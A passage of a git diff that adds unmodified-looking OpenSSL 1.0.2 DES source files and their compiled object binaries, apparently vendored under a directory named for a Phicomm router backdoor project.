+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+#include "des_ver.h"
+#include <openssl/opensslv.h>
+#include <openssl/bio.h>
+
+OPENSSL_GLOBAL const char libdes_version[] = "libdes" OPENSSL_VERSION_PTEXT;
+OPENSSL_GLOBAL const char DES_version[] = "DES" OPENSSL_VERSION_PTEXT;
+
+const char *DES_options(void)
+{
+    static int init = 1;
+    static char buf[32];
+
+    if (init) {
+        const char *ptr, *unroll, *risc, *size;
+
+#ifdef DES_PTR
+        ptr = "ptr";
+#else
+        ptr = "idx";
+#endif
+#if defined(DES_RISC1) || defined(DES_RISC2)
+# ifdef DES_RISC1
+        risc = "risc1";
+# endif
+# ifdef DES_RISC2
+        risc = "risc2";
+# endif
+#else
+        risc = "cisc";
+#endif
+#ifdef DES_UNROLL
+        unroll = "16";
+#else
+        unroll = "2";
+#endif
+        if (sizeof(DES_LONG) != sizeof(long))
+            size = "int";
+        else
+            size = "long";
+        BIO_snprintf(buf, sizeof buf, "des(%s,%s,%s,%s)", ptr, risc, unroll,
+                     size);
+        init = 0;
+    }
+    return (buf);
+}
+
+void DES_ecb_encrypt(const_DES_cblock *input, DES_cblock *output,
+                     DES_key_schedule *ks, int enc)
+{
+    register DES_LONG l;
+    DES_LONG ll[2];
+    const unsigned char *in = &(*input)[0];
+    unsigned char *out = &(*output)[0];
+
+    c2l(in, l);
+    ll[0] = l;
+    c2l(in, l);
+    ll[1] = l;
+    DES_encrypt1(ll, ks, enc);
+    l = ll[0];
+    l2c(l, out);
+    l = ll[1];
+    l2c(l, out);
+    l = ll[0] = ll[1] = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..d6e34cbaa310c19e463eae5d43567dc79f88f4a9
GIT binary patch
literal 2864
zcmbuA&2Jk;6u_UeP7|OwZpBBWLN$mKC88O5orX4u59h<lLRYw{QwhXjwYJy9YO-GK
zuB(ItMe@mtA|b@Tz<~?razT+&35hd8{0H>F1@#h9r1IX*j6Gep5fV?{nfHG4-kb64
zo7uZndwndI10^|l4@Q=v0KvpauOw;(rl0^1r!M~0e>VZ~rq%zWXdRA|Wgk9I-H!~L
z8@6EPktL{g_#zEjhe_ZAp(kNKC2a!w_ot6#vSXU1ZVet<gI@<f(=09PAb)9=atzjH
zCNc5Bgf;lx8suk0wuAhPH889L9Bf$&!ZjWjWBvQZPmk4qG~a?|Cu%~cwFfOPn!OZV
zR=+vu_%SWzG+C?GS>T2->$X`f@ceq+W+pH3GAozahpx}cC3EqV1UsDuPWxX{Y^<)n
z&1P>kdVbtvOMHQs=FO|U#5BJsmw4&QoWRL!d2EaL(0*=wbPL7+j))ofkh~x|$bEhj
za(l(xg|icrU*V=qBY#DXwW;4MOm7v~USSe|p?QrM%1vsjg<^lqF0i|W;xaj$BDCLm
z`15g=i;-Dzv{tp+C!-9^lqE*;Z=W1_4$YjFM@3Qr=CnLa3p3!1W{p$>vj3w2&y1Wj
z&46b$OQ;u<ZX8}sjl3>-3d5}A>7AIDJiVf_<Y&`~&^ACj#B%&9_UE<zPu@AQReY#^
z(((y{EKYHhN5v=gf$Yvx{QFPg-ylDy?f)BSlYEO0@d_CzbD{(AnhnSEn;eg@---ER
zX=w=>y*6JoOC{j;>J@4d%_OZ%%>v-Db-F>^>G}~k8+L7F*>-B{>-FlEv$ecpR~=aS
zpyot=5aJ!sPTb{0;eHSc+i#L?g5yN7+q~^Gw{JUbx3dE^yaXJY;f@zZIE4V>qz{=~
z{~6ii`An+x(PJU%d=jU3`M2a3G=I8b6&G~^bk6Zs9&uCipVGKG$K+4%Q{{PI^QW_-
z_?qOzXl;sLmz?tG{+k-7+C7o$cQvm2e=Rw&m+(>fzt{N78fTKzy!0q}M=FY|dITQr
z@5XKe`#2Q+w$egx$K|oN7Xxp(u?xHrMZm)@8RTwqEFED2Z+3TgJ^U_kzZ-iTuh#kG
z?MwSJzsG~H8+c*7k1>?k+jiQayX&bH{=c4KINhbHZdA64RPHGtd-BzV>WB8YqC?cb
zlpo$}GJtB1RCT}5cY%b?Bk}ZobV7qDlv|gyeHjNSXF5Jfik#u23)2nMsh(+manEUk
z1W{fS-LREdrBD7hF}-HUxgs4q!$_g9lx?9+uB8<JPR75P;t~(%r*om0?)pm>%<y%Q
z(Jh`{|8Fv$;g~M!{VBGO3c04^Ph|YZ%2D>|_!xOs{oIoUsrH5HhrWI)Ue!<5+%(k<
txu8Jybhn+)h^H^@ziJ2Bku0<yP}fENtsy#xT2}l6x&HppQz+^9e*pHhPyhe`

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ede_cbcm_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ede_cbcm_enc.c
new file mode 100644
index 0000000..86f27d0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ede_cbcm_enc.c
@@ -0,0 +1,189 @@
+/* ede_cbcm_enc.c */
+/*
+ * Written by Ben Laurie <ben@algroup.co.uk> for the OpenSSL project 13 Feb
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ *
+ * This is an implementation of Triple DES Cipher Block Chaining with Output
+ * Feedback Masking, by Coppersmith, Johnson and Matyas, (IBM and Certicom).
+ *
+ * Note that there is a known attack on this by Biham and Knudsen but it
+ * takes a lot of work:
+ *
+ * http://www.cs.technion.ac.il/users/wwwb/cgi-bin/tr-get.cgi/1998/CS/CS0928.ps.gz
+ *
+ */
+
+#include <openssl/opensslconf.h> /* To see if OPENSSL_NO_DESCBCM is defined */
+
+#ifndef OPENSSL_NO_DESCBCM
+# include "des_locl.h"
+
+void DES_ede3_cbcm_encrypt(const unsigned char *in, unsigned char *out,
+                           long length, DES_key_schedule *ks1,
+                           DES_key_schedule *ks2, DES_key_schedule *ks3,
+                           DES_cblock *ivec1, DES_cblock *ivec2, int enc)
+{
+    register DES_LONG tin0, tin1;
+    register DES_LONG tout0, tout1, xor0, xor1, m0, m1;
+    register long l = length;
+    DES_LONG tin[2];
+    unsigned char *iv1, *iv2;
+
+    iv1 = &(*ivec1)[0];
+    iv2 = &(*ivec2)[0];
+
+    if (enc) {
+        c2l(iv1, m0);
+        c2l(iv1, m1);
+        c2l(iv2, tout0);
+        c2l(iv2, tout1);
+        for (l -= 8; l >= -7; l -= 8) {
+            tin[0] = m0;
+            tin[1] = m1;
+            DES_encrypt1(tin, ks3, 1);
+            m0 = tin[0];
+            m1 = tin[1];
+
+            if (l < 0) {
+                c2ln(in, tin0, tin1, l + 8);
+            } else {
+                c2l(in, tin0);
+                c2l(in, tin1);
+            }
+            tin0 ^= tout0;
+            tin1 ^= tout1;
+
+            tin[0] = tin0;
+            tin[1] = tin1;
+            DES_encrypt1(tin, ks1, 1);
+            tin[0] ^= m0;
+            tin[1] ^= m1;
+            DES_encrypt1(tin, ks2, 0);
+            tin[0] ^= m0;
+            tin[1] ^= m1;
+            DES_encrypt1(tin, ks1, 1);
+            tout0 = tin[0];
+            tout1 = tin[1];
+
+            l2c(tout0, out);
+            l2c(tout1, out);
+        }
+        iv1 = &(*ivec1)[0];
+        l2c(m0, iv1);
+        l2c(m1, iv1);
+
+        iv2 = &(*ivec2)[0];
+        l2c(tout0, iv2);
+        l2c(tout1, iv2);
+    } else {
+        register DES_LONG t0, t1;
+
+        c2l(iv1, m0);
+        c2l(iv1, m1);
+        c2l(iv2, xor0);
+        c2l(iv2, xor1);
+        for (l -= 8; l >= -7; l -= 8) {
+            tin[0] = m0;
+            tin[1] = m1;
+            DES_encrypt1(tin, ks3, 1);
+            m0 = tin[0];
+            m1 = tin[1];
+
+            c2l(in, tin0);
+            c2l(in, tin1);
+
+            t0 = tin0;
+            t1 = tin1;
+
+            tin[0] = tin0;
+            tin[1] = tin1;
+            DES_encrypt1(tin, ks1, 0);
+            tin[0] ^= m0;
+            tin[1] ^= m1;
+            DES_encrypt1(tin, ks2, 1);
+            tin[0] ^= m0;
+            tin[1] ^= m1;
+            DES_encrypt1(tin, ks1, 0);
+            tout0 = tin[0];
+            tout1 = tin[1];
+
+            tout0 ^= xor0;
+            tout1 ^= xor1;
+            if (l < 0) {
+                l2cn(tout0, tout1, out, l + 8);
+            } else {
+                l2c(tout0, out);
+                l2c(tout1, out);
+            }
+            xor0 = t0;
+            xor1 = t1;
+        }
+
+        iv1 = &(*ivec1)[0];
+        l2c(m0, iv1);
+        l2c(m1, iv1);
+
+        iv2 = &(*ivec2)[0];
+        l2c(xor0, iv2);
+        l2c(xor1, iv2);
+    }
+    tin0 = tin1 = tout0 = tout1 = xor0 = xor1 = 0;
+    tin[0] = tin[1] = 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ede_cbcm_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ede_cbcm_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..10688c5862f9fb2923f42c883f6828a93b17f660
GIT binary patch
literal 3352
zcmbtVUu;uV7(ZRR(Gk3@hKD8ysqt!xNYl%RRzhZPx!vx_RTkRGg5b653WIIk(%nU7
z7BwlFo?NOv8jXZEc|%|JV0_rX5aq!?BqqF=jKq+!E<{5_z{&OdPS4pc*Y-g@$?f^R
z-}mQy=Xbty`gX?XY4iDr7(UWX)-{0=GT6B;r<j-`AtI66p>6loLpr^yzM>AOIiogo
zcOa|N+j?bXM5l%v)a^6!c?dA5CWj6Cw0sT}d%I?z2pC|GWb9<do(v4@_THyrVAAQV
zJg7L8ujJ1`BcapZw-M4;S-lrJ^MoJFwk1dO+N|9FC6<XxBr$bDho6`R!TlPw<Q%4n
zE@6h3-u*?h5r)W|4pLON!PS7Dgl<E4h<*xg`)j#qu&<`c9ih3h0}I|SzhTt2Vurp#
zpkny0bvujnSKYa?uo$klDf8%t+Kpi6Wzg@0=F+G?q%15(RC=-AuH4BeSGCaGe)Lcm
zu7@@Hjn?@?J)qoC=3RJD?ObShf2-HhPH66+qjvsS->BI^;7G5`2UX>FqyXld>jdbP
zOToU%O3+P&fkceCiNLrpBLHeqkP!tKVH~lP%*2v<to9hPhq;h0MjTzHOR4JU-G$|F
zwQx_POV#Xsy1cL)sTTfX^j5QfY6yh2>gZ}U`+zBtYSy`#c;GlqPEp6=Q!P)CC1qtQ
zS6QL_Ov9Qz$cVwnBs*h`=5X&hIib-bat?oDYrAX^&}^6M9Q=cxE+hbca;%pion}LJ
zqxJ}P2Uf;NNg+M@Oc^@qN$4a??!YdZ+Lo%GboAO`=&6-phW@P4pIAHB{s1EC{e6Yq
zUl_jcx}6&uy@maBE1atC(r6vz>K+Yaoh#fD0gKCt`_#|U9oPXH9bK(|oT14Koea?J
z8a)xf+6IU9t^m7QR(pen%GV>W9#xO1N7dI<^AhgiUyj~=`}Ra*14Gj#YdZQuyeppA
zsXRZ;ROPK*iFji7_6AHy08)qHYlpA*<pBbhc^)yi%4}@rv+vD=#CIy}+p=jx@I$!S
z2H=l#+eLKlk-{IeWu(aa{<IXW1=3RNOnXL3yw{;h$;yUa>7391iC;>pQbLtt;F6Xi
zX(^nRf;>r!2_KOF`ORr&_BVYAv361Y!%=>=+lMjK{A~Bl@aDz&iR-a-h55-wm$okY
z$%b`>OUU_SuKF2=fIST#+Pq^g0L}2e7C0#m7tO*@Vcaa13h@HbGFcO#t~IPYGiedC
z*Eo<?4f8-xPd1Y?b86bim<``j0X-CAnp0N3FlrV?M$KdS6JxxvvwX&0*#zIJ(-?~!
zhdyGg3j8xXNElxKi!JcQ7WgnGZj$GG3;c2m{CW%g0mpH|J0bf20&gj-AD<PmFA&*4
zfBar_)r|&$Kf`g+Q3Bt}apVw(z&CSToVmb*92a#7yp7|LMw+!ev%GF`SB3vH$D<zq
z631l^KFaZ!2S3j7XFa&tB0qN{BtA7WZsmtyw#topL`dc0SUzqQPgx{BoVW5MJ~TB&
z;tVZMG?2o?_;|4d4y6gJ7>9>zC+kwKA1_VEC(9F)#j-WS1B)Z(v2uRAxVHZP6rvE1
zly`XYq_{5bvoQ1H5h~dN682JR4QU7;@r2@>u`e)I^o=-Qd?yg+G=tO_ZJ4yl@UD;N
zg*pFg{BsbCIkBJIBf!^BxIvJ;Whop>dHl}tr!vY5#{J_x^zOeKFm&;*vzsrp18nXg
z_AlmMFbdi2XL<|eMz8N7z_C>C{$J<uQ648IQNPe9K){^d_;+~xh;ZbyH~u8x=$hho
zG0k&F(I?0s{ws-ifj3(lb1d=o`}v0Pt!oyK|A5}!!T2Qa-@~Z5hL^ub!PYGP8ZUIl
J6^o)b{%^PFLp=Zh

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_read.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_read.c
new file mode 100644
index 0000000..fcb6654
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_read.c
@@ -0,0 +1,235 @@
+/* crypto/des/enc_read.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include "des_locl.h"
+
+/* This has some uglies in it but it works - even over sockets. */
+/*
+ * extern int errno;
+ */
+OPENSSL_IMPLEMENT_GLOBAL(int, DES_rw_mode, DES_PCBC_MODE)
+
+/*-
+ * WARNINGS:
+ *
+ *  -  The data format used by DES_enc_write() and DES_enc_read()
+ *     has a cryptographic weakness: When asked to write more
+ *     than MAXWRITE bytes, DES_enc_write will split the data
+ *     into several chunks that are all encrypted
+ *     using the same IV.  So don't use these functions unless you
+ *     are sure you know what you do (in which case you might
+ *     not want to use them anyway).
+ *
+ *  -  This code cannot handle non-blocking sockets.
+ *
+ *  -  This function uses an internal state and thus cannot be
+ *     used on multiple files.
+ */
+int DES_enc_read(int fd, void *buf, int len, DES_key_schedule *sched,
+                 DES_cblock *iv)
+{
+#if defined(OPENSSL_NO_POSIX_IO)
+    return (0);
+#else
+    /* data to be unencrypted */
+    int net_num = 0;
+    static unsigned char *net = NULL;
+    /*
+     * extra unencrypted data for when a block of 100 comes in but is
+     * des_read one byte at a time.
+     */
+    static unsigned char *unnet = NULL;
+    static int unnet_start = 0;
+    static int unnet_left = 0;
+    static unsigned char *tmpbuf = NULL;
+    int i;
+    long num = 0, rnum;
+    unsigned char *p;
+
+    if (tmpbuf == NULL) {
+        tmpbuf = OPENSSL_malloc(BSIZE);
+        if (tmpbuf == NULL)
+            return (-1);
+    }
+    if (net == NULL) {
+        net = OPENSSL_malloc(BSIZE);
+        if (net == NULL)
+            return (-1);
+    }
+    if (unnet == NULL) {
+        unnet = OPENSSL_malloc(BSIZE);
+        if (unnet == NULL)
+            return (-1);
+    }
+    /* left over data from last decrypt */
+    if (unnet_left != 0) {
+        if (unnet_left < len) {
+            /*
+             * we still still need more data but will return with the number
+             * of bytes we have - should always check the return value
+             */
+            memcpy(buf, &(unnet[unnet_start]), unnet_left);
+            /*
+             * eay 26/08/92 I had the next 2 lines reversed :-(
+             */
+            i = unnet_left;
+            unnet_start = unnet_left = 0;
+        } else {
+            memcpy(buf, &(unnet[unnet_start]), len);
+            unnet_start += len;
+            unnet_left -= len;
+            i = len;
+        }
+        return (i);
+    }
+
+    /* We need to get more data. */
+    if (len > MAXWRITE)
+        len = MAXWRITE;
+
+    /* first - get the length */
+    while (net_num < HDRSIZE) {
+# ifndef OPENSSL_SYS_WIN32
+        i = read(fd, (void *)&(net[net_num]), HDRSIZE - net_num);
+# else
+        i = _read(fd, (void *)&(net[net_num]), HDRSIZE - net_num);
+# endif
+# ifdef EINTR
+        if ((i == -1) && (errno == EINTR))
+            continue;
+# endif
+        if (i <= 0)
+            return (0);
+        net_num += i;
+    }
+
+    /* we now have at net_num bytes in net */
+    p = net;
+    /* num=0;  */
+    n2l(p, num);
+    /*
+     * num should be rounded up to the next group of eight we make sure that
+     * we have read a multiple of 8 bytes from the net.
+     */
+    if ((num > MAXWRITE) || (num < 0)) /* error */
+        return (-1);
+    rnum = (num < 8) ? 8 : ((num + 7) / 8 * 8);
+
+    net_num = 0;
+    while (net_num < rnum) {
+# ifndef OPENSSL_SYS_WIN32
+        i = read(fd, (void *)&(net[net_num]), rnum - net_num);
+# else
+        i = _read(fd, (void *)&(net[net_num]), rnum - net_num);
+# endif
+# ifdef EINTR
+        if ((i == -1) && (errno == EINTR))
+            continue;
+# endif
+        if (i <= 0)
+            return (0);
+        net_num += i;
+    }
+
+    /* Check if there will be data left over. */
+    if (len < num) {
+        if (DES_rw_mode & DES_PCBC_MODE)
+            DES_pcbc_encrypt(net, unnet, num, sched, iv, DES_DECRYPT);
+        else
+            DES_cbc_encrypt(net, unnet, num, sched, iv, DES_DECRYPT);
+        memcpy(buf, unnet, len);
+        unnet_start = len;
+        unnet_left = num - len;
+
+        /*
+         * The following line is done because we return num as the number of
+         * bytes read.
+         */
+        num = len;
+    } else {
+        /*-
+         * >output is a multiple of 8 byes, if len < rnum
+         * >we must be careful.  The user must be aware that this
+         * >routine will write more bytes than he asked for.
+         * >The length of the buffer must be correct.
+         * FIXED - Should be ok now 18-9-90 - eay */
+        if (len < rnum) {
+
+            if (DES_rw_mode & DES_PCBC_MODE)
+                DES_pcbc_encrypt(net, tmpbuf, num, sched, iv, DES_DECRYPT);
+            else
+                DES_cbc_encrypt(net, tmpbuf, num, sched, iv, DES_DECRYPT);
+
+            /*
+             * eay 26/08/92 fix a bug that returned more bytes than you asked
+             * for (returned len bytes :-(
+             */
+            memcpy(buf, tmpbuf, num);
+        } else {
+            if (DES_rw_mode & DES_PCBC_MODE)
+                DES_pcbc_encrypt(net, buf, num, sched, iv, DES_DECRYPT);
+            else
+                DES_cbc_encrypt(net, buf, num, sched, iv, DES_DECRYPT);
+        }
+    }
+    return num;
+#endif                          /* OPENSSL_NO_POSIX_IO */
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_read.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_read.o
new file mode 100644
index 0000000000000000000000000000000000000000..f7a718f5342681386a618cb9ad325eb2a061f76f
GIT binary patch
literal 3776
zcmbtXZ)_Ar6rbxATd`~lf;K_SX-?A$Z0>+ci(tCfyLKBFYiO%M#PzzpTJ`?a>z;t7
zsJRqfPrwhF;3vNj!w0|k#l!|f2@oI%AM^_`AyFcMdO*NNLlijQo1J&et-VO%OXg<Y
zZ{GX8H*aQV+IM3{ca6`-NPO&Rc1I(WvCjLXF&}m^g)LySjSv5&y`VWI?fG8kj5eqZ
z4E8%e>iNqpdVT}9)15UzyMeTvRcxC|!o;E4PR0x;8m!lMx1r%B{4oj$Oit_0JXCWh
zwEXGPOtOZtsW(BtD<}I@IoOJ+x9-~OvuI%@#*9r~$;}U6(GJ#vQcUX>&rWx)>3%-a
zI?hczsu$J=d#%&Qd6wukyZ_F3<{(s1Ydz;Xi)OlYYIc9r;oO>Y&Ry8d=U{SY#rgKy
z#>rg(MV<4y^+(hxiD0e2xh1lGkc@AX?4y&@je7>c!FMcw%fIu4Uf`J&SmOySspcHr
zz&aUg{NUj2Qt7*TNU%45vu@{t-rdPyoqqV1Uq5`oe>@sojJfNU9bBvz_;%?XS0}o3
zhlg#}TYuMmw;`Ky@aFuDQf`T)V&bQPqd0{b9f6S#Sc_l1|2M{;!XG!a#=f8OKl==;
zxUu8HM2}wJwTy*N8qRgYIX^jV*KyY3Jl^qR0L3$$nT^h6VeKpfdZ={kS+|JAf!>ZQ
z6RZA<OU&b57|t)V`-{u;!kS>!&@tzNo<G_WbuMk$s=cIb)n3-jBjs-*k+#fiB0j8I
zjP-PNtqZga4&~BzF3_Q_RzoYpYja!;?_3p9Lu*=H7_!F0)C3K;spr{21}AzNF+VgE
zz7f#--rmG~+nan#8|vymf&DcAdk76cE`k&5R+{$K#FXYe{+JTjT^mtaKAxv3p<VZA
zN_)PpTY1HQs77gzDj`j2i70`H(i~BmB1%1HsQv??Ajj*axh(wU)mP5?%h`KzT-m?H
z&sSfGH-PGc$jt(#JW)p+YlcGjBQQpsbm~_KoFY@dUf|GiAsiJyt8+omufNP*IpJsb
zRsx`H<Vg7%sF?S&dn$BPHbGk?)sycjU?wzLD-6q$gV9`gz6$<g75r1c7fSm@bvRJP
z{@W@zlRf}DH8zwRQQO+WA(l?qFbF-#a%nMK>kiFiVuVk12z}g+XF1T$RHG}zqOpFH
zNSWDV^hGqo?Cb9Cj}4duTEvK%tZUQe=LY)BR6Lo?Sj;pN*=#yv!Z>cfmPs>nd^A3s
z*=8bBcAJ^X3@142m^EY}b#}*?%>h}5^`Y=91$z9nuqO9ILs{;2Wt^VBZV6Xle6!@r
zGXh7BMG}ttfkOQBoxkJ49G7|C6S$XWuVjyN_}!rFbGtG>-6vm5xXk~Jz`gv(Bzv60
zhH}R3%KSoQzj|=0!&MJXJapu#4rJee7Y_*GH$*+3@Zhc$W2-$l@oW${#=|`%e2d4P
z>h`*1k9$J)A62pcz6yS^3eTSsF6Z+YE))d2CD17DItj-$P~8lHqyB(o-!I`0O896M
zp0o$2xZ6EAP;uGi!Rg%Y6Sy~@FC<*f=gTTQ$0d7tU1ua*<_U<ra9WtSh&sL_Wygn@
zI&Np(ew0SpL^7`0iS0I1hvRmfsYB!AOwDFcLG!R0W~!A*r4nf{NoVYY3QzM&xS*^z
zg#Kzer;cSaV~MQ216+|XF=~!v<Eey5=zn$r@W-R#eJMHtL!tM<)m&Q|W4{y{?nNiG
z3K37+0dXPV{e^Mpy`=Z{ae>plK^!dtpmRvLSI2i3IlcZN0R+fV^c0`qFbpuSRRoBh
z{OR7MY4KUnb;8$;ScnWn|CETo+=F}ldtsh1*>uFaATjB+-3&OEy5dZNK6;ny$Ny@O
z)9e4C@E?UaS-ka2!sJ~0e_+1rMf;3(#J^t1pYXY2qvtgdzf&ZJ_a^=w;`K+)xk?oh
a2l^z;%i^uyLYSP(e_G^E?<8?}{r>?Y@=FW=

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_writ.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/enc_writ.c
new file mode 100644
index 0000000..b4eecc3
--- /dev/null
